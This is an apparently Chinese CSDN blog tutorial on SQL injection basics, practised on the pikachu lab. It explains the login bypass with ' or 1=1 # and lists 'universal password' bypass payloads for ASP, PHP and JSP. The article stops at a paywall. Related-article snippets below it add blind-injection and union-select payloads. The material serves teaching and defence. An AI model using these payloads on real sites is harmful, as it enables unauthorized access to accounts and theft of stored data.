SQL基础注入详解

最新推荐文章于 2024-03-12 16:39:52 发布
最新推荐文章于 2024-03-12 16:39:52 发布
阅读量1.4k 收藏 6
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45512184/article/details/105920180
版权
本文详细讲解了SQL注入的概念、原因、危害,以及如何判断和防范这种攻击。通过实例展示了如何利用万能密码进行登录,讨论了数字型、字符型、搜索型等多种注入方式,并提到了information_schema注入和函数报错注入等高级技巧。
摘要由CSDN通过智能技术生成

目录

基于pikachu靶场进行实验,后续更新双注入,盲注,cookie注入,HTTP-Referer注入

一.什么是SQL注入

SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入。

二.SQL注入原因

产生SQL注入的原因是接受相关参数未经处理直接带入数据库进行查询操作,其产生与平台、脚本无关!

三.SQL注入危害

攻击者可以访问数据库中的数据,盗取用户的信息,造成用户的信息泄露,还可以对数据库的数据进行任意操作,添加管理员账户进行登录等等。

四.简单OR漏洞原理

剖析登录过程

  1. 正常情况下,我们在前端页面输入用户名和密码,前端数据会传到后端的数据库进行查询,验证是否存在此用户,其在数据库进行查询的语句如下:
select * from 表名 where name=‘xxx’ and password=’xxx‘;
  1. 若不对参数进行过滤,存在SQL注入,我们就可以构造以下的信息来进行登录:
用户名:'or 1=1 #
密码:任意
  1. 成功登录的原因是输入的信息传到后端数据库进行查询的语句如下:
select * from 表名 where name='' or 1=1 # ' and password=’xxx';

相当于

select * from 表名;

'号的作用是闭合变量的值,#号的作用是注释后面的语句,注释的符号根据数据库类型而定, or 1=1这个语句是无论什么时候都是正确的,因为or连接的条件中只要其一正确,命题就为真,恰好1=1这个条件就是恒成立的。

五.万能密码参考

此处出自https://me.csdn.net/dyw_666666

asp aspx万能密码

  1. or 1=1- -
  2. 'or 1=1- -
  3. "or 1=1- -
  4. ‘or"=’
  5. ‘or’=‘or’
  6. "or “a”="a
  7. ')or(‘a’='a
  8. a’or’ 1=1- -
  9. ‘or’a’='a
  10. “or”="a’='a
  11. 1 or 1’=‘1’=1
  12. 1 or ‘1’=‘1’ or 1=1
  13. 'or 1=1%00
  14. "or 1=1%00
  15. 'xor
  16. admin’ or ‘a’='a

php万能密码

  1. ‘or’=‘or’
  2. 'or 1=1/* 字符型 GPC是否开都可以使用
  3. User: something Password: ’ or ‘1’='1

jsp万能密码

  1. 1’or’1’='1
  2. admin’ or 1=1/*
  3. 用户名:admin 系统存在这个用户的时候 才用得上 密码:1’or’1’='1

六.思路

在这里插入图片描述

七.判断存在SQL注入

最低0.47元/天 解锁文章
nu22
关注
SQL注入详解(扫盲篇)
09-09
SQL注入是一种常见的网络安全威胁,它发生在web应用程序中,由于开发者未能正确过滤或验证用户输入的数据,使得攻击者能够向数据库提交恶意的SQL语句。在本文中,我们将深入理解SQL注入的基本概念、工作原理以及常见...
SQL基本注入演示
xiaoi123的博客
12-14 464
作者:ZERO 所属团队:Arctic Shell 参考文献:《sql注入攻击与防御》 使用平台:pikachu漏洞练习平台 导语:  在owasp发布的top10排行榜中注入漏洞一直是危害排名极高的漏洞,数据库注入一直是web中一个令人头疼的问题。   一个严重的SQL注入漏洞,可能会直接导致一家公司破产!这并不是戏言,其实SQL注入漏洞最主要的形成原因是在进行数据交互中,当前端的数据传...
sql基本注入总结
weixin_34250434的博客
07-24 73
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入原理,及sql基础注入方式
magic55574的博客
11-01 206
http://service.tianya.cn/login/?base_path=http%3A%2F%2Fservice.tianya.cn&css_verson=2014.12.30002&css_path=http%3A%2F%2Fservice.tianya.cn%2Fcss&base_title=%E5%A4%A9%E6%B6%AF%E5%AE%A2%E6%9C%8D%E5%B9%B3%E5%8F%B0&js_verson=2014.12.30017&js
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数
weixin_44371476的博客
07-02 2256
基于时间的盲注 表名的字典 1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+ ?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+ ?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+ 基于布尔的盲注 ?id=-1%27%20or%20left(database(),1)=%27u%27%20...
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9219
sql注入中的union联合查询,union select 1,2,3
DVWA之SQL注入详解(包含知识点)
10-20
SQL注入是网络安全领域中的一种常见的攻击手段,它允许攻击者通过在应用程序的输入参数中插入恶意的SQL代码片段,从而在数据库服务器上执行未授权的查询或操作。这种攻击方法对数据库安全构成了极大的威胁,因此了解...
SQL注入详解
11-02
sql注入详细教学ppt,解决你对sql注入的一切疑问,黑客第一步!
浅谈SQL注入中的-1‘ union select 1,2,3#
最新发布
dzqxwzoe的博客
03-12 1499
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库的SQL注入语句。
2.1 union联合查询注入
n0d_xy的博客
04-14 1337
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
SQL手工注入探索旅程(一)
Louisnie
09-30 9312
SQL注入漏洞原理 由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句 实验环境: kali:192.168.128.128/24 metasploit:192.168.128.129/24 我们首先看一段很简单的PHP代码查询数据...
从零基础认识SQL注入
热门推荐
你不知道你不知道的事
09-30 3万+
SQL注入1.什么是SQL注入 看一下下面的案例场景,这是正常情况下的登陆场景: 而当我们使用 用户名‘:– 的时候,密码随便输入也可以登陆成功↓ 这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且将后半句检索条件注释起来达到免密码登陆效果。 sql注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情
SELECT 1,2,3...的含义及其在SQL注入中的用法
weixin_44840696的博客
04-09 2万+
SQL注入中,有两个工具常常用到,一个是select接一串数字,如select 1,2,3;另一个是order by一个数字,如order by 4。那么这两个工具的内涵是什么,在SQL注入中又有什么作用呢? 首先,select 之后可以接一串数字:1,2,3…只是一个例子,这串数字并不一定要按从小到大排列,也不一定从1开始,这串数字的值和顺序是任意的,甚至可以是重复的,如:11,465...
Web安全之SQL注入
whuhewei的博客
03-10 1061
一、什么是SQL注入SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据...
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
史上最全的 SQL 注入资料
笑释一切的博客
09-28 9361
什么是 SQL 注入速查表?SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源。这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份很好的参考资料。关于这份 SQL 注入速查表这份 SQL 速查表最初是 2007 年时 Ferruh Mavituna 在他自己的博客上发布的。我们更新了它并将它移到了公司 CEO 的博客上。现在,这份速
SQL注入漏洞详解与防范
"SQL注入漏洞全接触:深入解析与防范" SQL注入是一种常见的网络安全问题,主要发生在基于B/S架构的应用程序中。当开发者在编写代码时未能充分验证用户输入的数据,攻击者可以通过输入恶意的SQL代码,使得应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值